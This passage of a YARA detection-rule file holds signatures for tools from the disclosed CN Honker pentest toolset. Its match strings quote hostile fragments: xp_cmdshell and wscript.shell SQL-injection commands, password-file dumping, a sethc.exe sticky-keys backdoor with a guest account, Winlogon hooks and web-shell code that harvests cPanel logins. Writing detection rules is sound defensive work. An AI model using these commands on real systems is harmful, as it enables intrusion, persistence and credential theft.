license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "f0c9106d6d2eea686fd96622986b641968d0b864"
id = "f5d49cbd-1aec-5126-ab5d-83e485fa6869"
strings:
$s0 = "GetMod;ul" fullword ascii
$s1 = "excjpb" fullword ascii
$s2 = "LEAUT1" fullword ascii
$s3 = "EnumProcessModules" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 410 times */
condition:
uint16(0) == 0x5a4d and filesize < 50KB and all of them
}
CN_Honker_IIS_logcleaner1_0_readme
Script from disclosed CN Honker Pentest Toolset - file readme.txt
rule CN_Honker_IIS_logcleaner1_0_readme {
meta:
description = "Script from disclosed CN Honker Pentest Toolset - file readme.txt"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "2ab47d876b49e9a693f602f3545381415e82a556"
id = "6f3605ab-cf9d-5f6b-8d89-6269976c5b0b"
strings:
$s2 = "LogCleaner.exe <ip> [Logpath]" fullword ascii
$s3 = "http://l-y.vicp.net" fullword ascii
condition:
filesize < 7KB and all of them
}
CN_Honker_Injection
Sample from CN Honker Pentest Toolset - file Injection.exe
rule CN_Honker_Injection {
meta:
description = "Sample from CN Honker Pentest Toolset - file Injection.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "3484ed16e6f9e0d603cbc5cb44e46b8b7e775d35"
id = "8600c86f-0da1-5ddb-bae5-69358cf53e7c"
strings:
$s0 = "http://127.0.0.1/6kbbs/bank.asp" fullword ascii /* PEStudio Blacklist: strings */
$s7 = "jmPost.asp" fullword wide /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 220KB and all of them
}
CN_Honker_Injection_Transit_jmCook
Script from disclosed CN Honker Pentest Toolset - file jmCook.asp
rule CN_Honker_Injection_Transit_jmCook {
meta:
description = "Script from disclosed CN Honker Pentest Toolset - file jmCook.asp"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "5e1851c77ce922e682333a3cb83b8506e1d7395d"
id = "468abb0e-a163-5fc5-b6a1-896fc04b8570"
strings:
$s1 = ".Open \"POST\",PostUrl,False" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "JmdcwName=request(\"jmdcw\")" fullword ascii /* PEStudio Blacklist: strings */
condition:
filesize < 9KB and all of them
}
CN_Honker_Injection_transit
Sample from CN Honker Pentest Toolset - file Injection_transit.exe
rule CN_Honker_Injection_transit {
meta:
description = "Sample from CN Honker Pentest Toolset - file Injection_transit.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "f4fef2e3d310494a3c3962a49c7c5a9ea072b2ea"
id = "8600c86f-0da1-5ddb-bae5-69358cf53e7c"
strings:
$s0 = "<description>Your app description here</description> " fullword ascii /* PEStudio Blacklist: strings */
$s4 = "Copyright (C) 2003 ZYDSoft Corp." fullword wide /* PEStudio Blacklist: os */
$s5 = "ScriptnackgBun" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 3175KB and all of them
}
CN_Honker_Interception
Sample from CN Honker Pentest Toolset - file Interception.exe
rule CN_Honker_Interception {
meta:
description = "Sample from CN Honker Pentest Toolset - file Interception.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "ea813aed322e210ea6ae42b73b1250408bf40e7a"
id = "40d350e5-c6af-58e2-a1d8-f9516af5f869"
strings:
$s2 = ".\\dat\\Hookmsgina.dll" fullword ascii /* PEStudio Blacklist: strings */
$s5 = "WinlogonHackEx " fullword wide /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 160KB and all of them
}
CN_Honker_Interception3389_setup
Sample from CN Honker Pentest Toolset - file setup.exe
rule CN_Honker_Interception3389_setup {
meta:
description = "Sample from CN Honker Pentest Toolset - file setup.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "f5b2f86f8e7cdc00aa1cb1b04bc3d278eb17bf5c"
id = "7250ff73-6b08-56a4-b2bc-081060d1fa2d"
strings:
$s0 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\%s" fullword ascii /* PEStudio Blacklist: strings */
$s1 = "%s\\temp\\temp%d.bat" fullword ascii /* PEStudio Blacklist: strings */
$s5 = "EventStartShell" fullword ascii /* PEStudio Blacklist: strings */
$s6 = "del /f /q \"%s\"" fullword ascii
$s7 = "\\wminotify.dll" ascii
condition:
uint16(0) == 0x5a4d and filesize < 400KB and all of them
}
CN_Honker_Intersect2_Beta
Script from disclosed CN Honker Pentest Toolset - file Intersect2-Beta.py
rule CN_Honker_Intersect2_Beta {
meta:
description = "Script from disclosed CN Honker Pentest Toolset - file Intersect2-Beta.py"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "3ba5f720c4994cd4ad519b457e232365e66f37cc"
id = "d20da18d-f8c9-5eb3-8d5d-c8816cff3200"
strings:
$s1 = "os.system(\"ls -alhR /home > AllUsers.txt\")" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "os.system('getent passwd > passwd.txt')" fullword ascii /* PEStudio Blacklist: strings */
$s3 = "os.system(\"rm -rf credentials/\")" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x2123 and filesize < 50KB and 2 of them
}
CN_Honker_InvasionErasor
Sample from CN Honker Pentest Toolset - file InvasionErasor.exe
rule CN_Honker_InvasionErasor {
meta:
description = "Sample from CN Honker Pentest Toolset - file InvasionErasor.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "b37ecd9ee6b137a29c9b9d2801473a521b168794"
id = "03ccb643-9f92-5278-a358-65f56cf19ccc"
strings:
$s1 = "c:\\windows\\system32\\config\\*.*" fullword wide /* PEStudio Blacklist: strings */
$s2 = "c:\\winnt\\*.txt" fullword wide /* PEStudio Blacklist: os */
$s3 = "Command1" fullword ascii /* PEStudio Blacklist: strings */
$s4 = "Win2003" fullword ascii /* PEStudio Blacklist: os */
$s5 = "Win 2000" fullword ascii /* PEStudio Blacklist: os */
condition:
uint16(0) == 0x5a4d and filesize < 60KB and all of them
}
CN_Honker_LPK2_0_LPK
Sample from CN Honker Pentest Toolset - file LPK.DAT
rule CN_Honker_LPK2_0_LPK {
meta:
description = "Sample from CN Honker Pentest Toolset - file LPK.DAT"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "5a1226e73daba516c889328f295e728f07fdf1c3"
id = "4aa40b78-5fe4-5312-881c-e5a292435ff0"
strings:
$s1 = "\\sethc.exe /G everyone:F" ascii /* PEStudio Blacklist: strings */
$s2 = "net1 user guest guest123!@#" fullword ascii /* PEStudio Blacklist: strings */
$s3 = "\\dllcache\\sethc.exe" ascii
$s4 = "sathc.exe 211" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 1030KB and all of them
}
CN_Honker_Layer_Layer
Sample from CN Honker Pentest Toolset - file Layer.exe
rule CN_Honker_Layer_Layer {
meta:
description = "Sample from CN Honker Pentest Toolset - file Layer.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
modified = "2022-12-21"
score = 70
hash = "0f4f27e842787cb854bd61f9aca86a63f653eb41"
id = "48e27119-da7e-5921-8d4f-f8a1e3ac0439"
strings:
$s1 = "\\Release\\Layer.pdb" ascii
$s2 = "Layer.exe" fullword wide
$s3 = "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0" fullword wide /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 300KB and all of them
}
CN_Honker_LogCleaner
Sample from CN Honker Pentest Toolset - file LogCleaner.exe
rule CN_Honker_LogCleaner {
meta:
description = "Sample from CN Honker Pentest Toolset - file LogCleaner.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "ab77ed5804b0394d58717c5f844d9c0da5a9f03e"
id = "63ec5e47-9f3e-547a-bbff-cac8b27ac8f7"
strings:
$s3 = ".exe <ip> [(path]" fullword ascii
$s4 = "LogCleaner v" ascii
condition:
uint16(0) == 0x5a4d and filesize < 250KB and all of them
}
CN_Honker_MAC_IPMAC
Sample from CN Honker Pentest Toolset - file IPMAC.exe
rule CN_Honker_MAC_IPMAC {
meta:
description = "Sample from CN Honker Pentest Toolset - file IPMAC.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "24d55b6bec5c9fff4cd6f345bacac7abadce1611"
id = "5424d3a7-765a-5dfb-9177-d5633f83079f"
strings:
$s1 = "Http://Www.YrYz.Net" fullword wide
$s2 = "IpMac.txt" fullword ascii
$s3 = "192.168.0.1" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 267KB and all of them
}
CN_Honker_MSTSC_can_direct_copy
Sample from CN Honker Pentest Toolset - file MSTSC_can_direct_copy.EXE
rule CN_Honker_MSTSC_can_direct_copy {
meta:
description = "Sample from CN Honker Pentest Toolset - file MSTSC_can_direct_copy.EXE"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
modified = "2022-12-21"
score = 70
hash = "2f3cbfd9f82f8abafdb1d33235fa6bfa1e1f71ae"
id = "9155cb6f-14b6-524a-9cb9-1a88f7facf4e"
strings:
$s1 = "srv\\newclient\\lib\\win32\\obj\\i386\\mstsc.pdb" ascii
$s2 = "Clear Password" fullword wide /* PEStudio Blacklist: strings */
$s3 = "/migrate -- migrates legacy connection files that were created with " fullword wide /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 600KB and all of them
}
CN_Honker_ManualInjection
Sample from CN Honker Pentest Toolset - file ManualInjection.exe
rule CN_Honker_ManualInjection {
meta:
description = "Sample from CN Honker Pentest Toolset - file ManualInjection.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "e83d427f44783088a84e9c231c6816c214434526"
id = "f0899003-824f-56ed-b653-9f7a77b9ec6a"
strings:
$s0 = "http://127.0.0.1/cookie.asp?fuck=" fullword ascii /* PEStudio Blacklist: strings */
$s16 = "http://Www.cnhuker.com | http://www.0855.tv" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 3000KB and all of them
}
CN_Honker_Master_beta_1_7
Sample from CN Honker Pentest Toolset - file Master_beta_1.7.exe
rule CN_Honker_Master_beta_1_7 {
meta:
description = "Sample from CN Honker Pentest Toolset - file Master_beta_1.7.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "3be7a370791f29be89acccf3f2608fd165e8059e"
id = "78f904ec-f7cb-5fd0-a117-925ebedd1d3e"
strings:
$s1 = "http://seo.chinaz.com/?host=" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "Location: getpass.asp?info=" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 312KB and all of them
}
CN_Honker_MatriXay1073
Sample from CN Honker Pentest Toolset - file MatriXay1073.exe
rule CN_Honker_MatriXay1073 {
meta:
description = "Sample from CN Honker Pentest Toolset - file MatriXay1073.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
modified = "2023-01-27"
score = 70
hash = "fef951e47524f827c7698f4508ba9551359578a5"
id = "23e73b89-f60e-5bc3-8974-15be16d7c408"
strings:
$s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1" ascii /* PEStudio Blacklist: strings */
$s1 = "Policy\\Scan\\GetUserLen.ini" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "!YEL!Using http://127.0.0.1:%d/ to visiter https://%s:%d/" ascii /* PEStudio Blacklist: strings */
$s3 = "getalluserpasswordhash" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 9100KB and all of them
}
CN_Honker_Md5CrackTools
Sample from CN Honker Pentest Toolset - file Md5CrackTools.exe
rule CN_Honker_Md5CrackTools {
meta:
description = "Sample from CN Honker Pentest Toolset - file Md5CrackTools.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "9dfd9c9923ae6f6fe4cbfa9eb69688269285939c"
id = "16e04a66-0f6f-5b94-97c3-df62aa9406a9"
strings:
$s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii /* PEStudio Blacklist: agent */
$s2 = ",<a href='index.php?c=1&type=md5&hash=" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 4580KB and all of them
}
CN_Honker_NBSI_3_0
Sample from CN Honker Pentest Toolset - file NBSI 3.0.exe
rule CN_Honker_NBSI_3_0 {
meta:
description = "Sample from CN Honker Pentest Toolset - file NBSI 3.0.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "93bf0f64bec926e9aa2caf4c28df9af27ec0e104"
id = "be8d0dce-4f7f-5f18-9ed0-99fc1dc2b22f"
strings:
$s1 = ";use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamet" wide /* PEStudio Blacklist: strings */
$s2 = "http://localhost/1.asp?id=16" fullword ascii /* PEStudio Blacklist: strings */
$s3 = " exec master.dbo.xp_cmdshell @Z--" fullword wide /* PEStudio Blacklist: strings */
$s4 = ";use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamet" wide /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 2600KB and 2 of them
}
CN_Honker_NetFuke_NetFuke
Sample from CN Honker Pentest Toolset - file NetFuke.exe
rule CN_Honker_NetFuke_NetFuke {
meta:
description = "Sample from CN Honker Pentest Toolset - file NetFuke.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "f89e223fd4f6f5a3c2a2ea225660ef0957fc07ba"
id = "833da5c7-e562-50e9-a2a9-54c36b0d1f61"
strings:
$s1 = "Mac Flood: Flooding %dT %d p/s " fullword ascii
$s2 = "netfuke_%s.txt" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 1840KB and all of them
}
CN_Honker_Oracle_v1_0_Oracle
Sample from CN Honker Pentest Toolset - file Oracle.exe
rule CN_Honker_Oracle_v1_0_Oracle {
meta:
description = "Sample from CN Honker Pentest Toolset - file Oracle.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "0264f4efdba09eaf1e681220ba96de8498ab3580"
id = "0cebede9-f4ff-5efb-98bc-55df0ad656a3"
strings:
$s1 = "!http://localhost/index.asp?id=zhr" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "OnGetPassword" fullword ascii /* PEStudio Blacklist: strings */
$s3 = "Mozilla/3.0 (compatible; Indy Library)" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 3455KB and all of them
}
CN_Honker_PHP_php11
Sample from CN Honker Pentest Toolset - file php11.txt
rule CN_Honker_PHP_php11 {
meta:
description = "Sample from CN Honker Pentest Toolset - file php11.txt"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "dcc8226e7eb20e4d4bef9e263c14460a7ee5e030"
id = "e20eaab1-9799-5e61-9a25-3ac0dcce5f7f"
strings:
$s1 = "<tr><td><b><?php if (!$win) {echo wordwrap(myshellexec('id'),90,'<br>',1);} else" ascii /* PEStudio Blacklist: strings */
$s2 = "foreach (glob($_GET['pathtomass'].\"/*.htm\") as $injectj00) {" fullword ascii /* PEStudio Blacklist: strings */
$s3 = "echo '[cPanel Found] '.$login.':'.$pass.\" Success\\n\";" fullword ascii /* PEStudio Blacklist: strings */
condition:
filesize < 800KB and all of them
}
CN_Honker_Perl_serv_U
Script from disclosed CN Honker Pentest Toolset - file Perl-serv-U.pl
rule CN_Honker_Perl_serv_U {
meta:
description = "Script from disclosed CN Honker Pentest Toolset - file Perl-serv-U.pl"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "f333c597ff746ebd5a641fbc248497d61e3ec17b"
id = "d793227d-dd4d-5c92-bfdc-9662c3ed8933"
strings:
$s1 = "$dir = 'C:\\\\WINNT\\\\System32\\\\';" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "$sock = IO::Socket::INET->new(\"127.0.0.1:$adminport\") || die \"fail\";" fullword ascii /* PEStudio Blacklist: strings */
condition:
filesize < 8KB and all of them
}